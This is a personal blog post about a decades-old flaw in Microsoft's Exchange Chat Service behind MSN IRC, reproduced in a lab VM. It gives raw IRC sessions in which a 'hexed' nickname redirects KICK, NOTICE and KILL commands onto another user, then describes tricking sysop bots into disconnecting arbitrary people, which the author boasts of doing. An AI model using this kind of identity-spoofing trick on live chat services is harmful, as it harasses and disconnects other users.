Rediscovering old vulns: /KILLing randoms on MSN IRC.
A few days ago I was shooting the shit with some folks on IRC, reminiscing about the good old days of the warzone that MSN’s IRC service was. I mentioned one particular bug that I’d found, and that someone I trusted took it and released it publically on me. The exact details of it escaped me, and so last night I wanted to see if I could figure out how to make it work again. I managed to get it working, so I decided to document it here.
The research setup
In order to test this, I needed an Exchange Chat Service server. So I fired up a Windows NT4 Server VM, and found an .ISO of the Exchange 5.5 installation CD. Installing ECS took about a minute all told, and I was off and running. All I had to do was configure the VM with bridged networking so I could connect to it from a modern machine.
A prerequisite vulnerability
This part I did not discover, but it’s required to understand how it works. My portion of it basically amounts to creative use of this exploit, and nothing more. I’m not sure who discovered it originally, it was passed around a lot - I found out about it when someone tried to do it to my IRCX-compliant eggdrops. It’s interesting though.
What you need to understand is that IRC itself was, for the most part, an entirely ASCII protocol initially. Microsoft’s implementation of IRCX attempted to address this limitation, by allowing Unicode characters in various situations. If you had an IRCX-capable client (such as later versions of mIRC) you can use many Unicode characters in your nick too! All you had to do was prefix your nick with an apostrophe character, and you’re away.
How does this work with ASCII-only IRC clients, and the IRC protocol in general? To interoperate with them, ECS would represent your nick as a series of hex values, prefixed with an apostrophe and a caret, eg fwaggle in hex would be '^66776167676C65. For non-IRCX clients, the leading apostrophe would be dropped, so the nick would appear to them as ^66776167676C65. Folks used to call this “hexing” someone’s nick.
Now here’s where it gets good - if you pass one of these “hexed” nicks as a target of a command on a non-IRCX session, ECS would “helpfully” convert it back to Unicode for you before acting on it. Here’s an example. Let’s open up two TCP sessions to the ECS server. The first one, we’ll join as the user test and grab ops on the channel #moo. Note my totes-RFC1459-compliant sign-on, which works fine on ECS as it literally couldn’t care less.
NICK test
USER test test test test
join #moo
Next, I’ll connect, wanting to be an asshole, and then “hex” the user test’s nick: '^74657374:
NICK fwaggle
USER fwaggle fwaggle fwaggle fwaggle
IRCX
NICK '^74657374
JOIN #moo
PRIVMSG #moo :oi dickhead, good job!
First session (with chanops) sees:
:^74657374!~fwaggle@10.255.254.15 PRIVMSG #moo :oi dickhead, good job!
NAMES #moo
:irseaex 353 test = #moo :^74657374 @test
:irseaex 366 test #moo :End of /NAMES list.
They’ve had enough of this shit.
KICK #moo ^74657374 :bye
Gets the decidedly unexpected:
:test!~test@10.255.254.15 KICK #moo test :bye
Attacker is still in the channel:
NAMES #moo
:irseaex 353 '^74657374 = #moo :'^74657374
:irseaex 366 '^74657374 #moo :End of /NAMES list.
Because the ECS “unhexed” the nick before acting on it, '^74657374 is converted internally to test before it’s acted upon. You can test this with pretty much any command, PRIVMSG, KICK, KILL, NOTICE, etc. The last two are what I worked out how to exploit.
Enter the Sysop Bots
Now the sysops (ircops elsewhere) on MSN’s IRC server had these “Sysop Bots”, which would basically do things like this:
WHO *fuck*
:irseaex 352 fwaggle * ~fuckoff 10.255.254.15 irseaex chatter H :0 balls
:irseaex 315 fwaggle *fuck* :End of /WHO list
… and any matching users would be sent a NOTICE warning them to remove the offensive words from their profile or they’ll be kicked. After two such warnings (IIRC, about 60 seconds apart, but do remember this was ~20 years ago), they’d issue a KILL command for the offending user.
The fun part was, these bots weren’t IRCX capable either! So you could play the same games with them:
as the user (who’s now a sysop, but still not IRCX-compliant) test:
WHO *fuck*
:irseaex 352 test * ~fuckoff 10.255.254.15 irseaex ^74657374 H :0 balls
:irseaex 315 test *fuck* :End of /WHO list
NOTICE ^74657374 :change your nicko, or get the kicko
:test!~test@10.255.254.15 NOTICE test :change your nicko, or get the kicko
… and the same thing happens for /KILL messages! So what you could do was connect a socket, with a random username, and a banned word in your username (the “email” field on most Windows IRC clients). Wait for the second NOTICE warning, then change your nick to the hexed version of your target.
When the KILL comes through, it hits them, and not you.
I sent many folks packing abusing this.
